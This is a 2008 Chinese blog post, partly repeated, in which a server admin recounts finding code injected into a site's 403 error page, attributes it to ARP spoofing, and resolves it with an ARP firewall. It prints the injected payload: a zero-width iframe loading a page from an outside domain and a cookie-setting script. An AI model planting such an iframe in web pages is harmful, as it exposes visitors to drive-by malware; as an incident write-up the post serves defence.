从我博客可以简单看出,偶的涉猎有多广,这倒不是为了显摆自己什么渊博之类,而是充分体现了本人工作的纷繁芜杂跟混乱无比。这不,昨天同事说服务器的部分站点.net程序不能跑了,今天就看了一下,因为有客户急着要看网站制作的进度,我们有一个站点是专门用于演示的,客户的网站在没有完全交付之前,都是放在这个站点与客户交流沟通问题之用,我上去看了一下,是权限的问题,重新分配下权限就OK了,但是,此时我在打开演示站点时,非常不幸的发现状态栏显示有不明网址的内容正在载入,此时,机器的杀毒软件也弹出了病毒警告!
啊!!!难道服务器被黑?——这是我的第一反应,后来检查,没有发现异常情况,(对服务器的安全检查我做的还是蛮频繁),所有的网页文件都是正常的,这就奇怪了,没有被插入木马,怎么挂的马呢?
我打开演示站点根目录,本来这里是禁止访问的403错误页,但内容竟然是这样的:
忠告:不要打开本文代码中包含在iframe中的网页,除非您确切知道您将要干什么,否则后果由您自己负责。
<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html><body>
<iframe src="http://xf.jebooo.com/s.htm" height=50 width=0></iframe>
<script language="javascript">
<!--var expires = new Date();expires.setTime(expires.getTime() +24*60*60*1000);document.cookie="GAGA=12345fuck;expires="+expires.toGMTString();-->
</script>
</body>
我想应该就是传说中的arp攻击了,(之前我一直只是有耳闻,没有亲见,而且403类的页面一般不太常见被黑客用来挂马)arp攻击的厉害之处就是只要机房里头有一台机器中毒,带毒机器将广播arp欺骗,告诉所有的“邻居”:我是网关!这样,同网段的所有机器进出站数据都将通过带毒机器转发,一切都变了!
“可怕……恐怖……”——引用下我同事的话,是啊,今天幸好星期天,要是明天才发现,让客户浏览了网站(客户一般都是电脑应用型用户),那可能真是灾难了!还好,听说360不错,自带个arp防火墙,尽管官方一再忠告不是局域网用户不要使用,可其他的防火墙要么收费,要么破解,我自己的机器我倒是敢尝试下,可这是服务器呀,相信流氓也得相信有点名气的流氓,是不?于是就装了360的那个arp防火墙2.0版本,重启后,服务器就正常了!访问403页面,下面不再有多余代码,哈!防火墙再为我们忠心的工作了,嗯,这次事件算是有惊无险,平安。闲来无事,略做小记。
相关日志:
SERV-U的安全设置步骤,杜绝serv-u溢出
啊!!!难道服务器被黑?——这是我的第一反应,后来检查,没有发现异常情况,(对服务器的安全检查我做的还是蛮频繁),所有的网页文件都是正常的,这就奇怪了,没有被插入木马,怎么挂的马呢?
我打开演示站点根目录,本来这里是禁止访问的403错误页,但内容竟然是这样的:
忠告:不要打开本文代码中包含在iframe中的网页,除非您确切知道您将要干什么,否则后果由您自己负责。
<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html><body>
<iframe src="http://xf.jebooo.com/s.htm" height=50 width=0></iframe>
<script language="javascript">
<!--var expires = new Date();expires.setTime(expires.getTime() +24*60*60*1000);document.cookie="GAGA=12345fuck;expires="+expires.toGMTString();-->
</script>
</body>
我想应该就是传说中的arp攻击了,(之前我一直只是有耳闻,没有亲见,而且403类的页面一般不太常见被黑客用来挂马)arp攻击的厉害之处就是只要机房里头有一台机器中毒,带毒机器将广播arp欺骗,告诉所有的“邻居”:我是网关!这样,同网段的所有机器进出站数据都将通过带毒机器转发,一切都变了!
“可怕……恐怖……”——引用下我同事的话,是啊,今天幸好星期天,要是明天才发现,让客户浏览了网站(客户一般都是电脑应用型用户),那可能真是灾难了!还好,听说360不错,自带个arp防火墙,尽管官方一再忠告不是局域网用户不要使用,可其他的防火墙要么收费,要么破解,我自己的机器我倒是敢尝试下,可这是服务器呀,相信流氓也得相信有点名气的流氓,是不?于是就装了360的那个arp防火墙2.0版本,重启后,服务器就正常了!访问403页面,下面不再有多余代码,哈!防火墙再为我们忠心的工作了,嗯,这次事件算是有惊无险,平安。闲来无事,略做小记。
相关日志:
SERV-U的安全设置步骤,杜绝serv-u溢出
03/02/2008 14:15, 
微软的IE7强制升级似乎并没有效果?看来任重道远
在php中让用户自定义时区 正确显示当前时间
wo_is神仙
恭喜恭喜
03/03/2008 09:27
LS
哈哈 。我被我朋友说成衰神附体了。很无语了。偶尔显摆显摆吧。又不犯罪。
03/02/2008 18:42
分页: 1/1 
1 
1
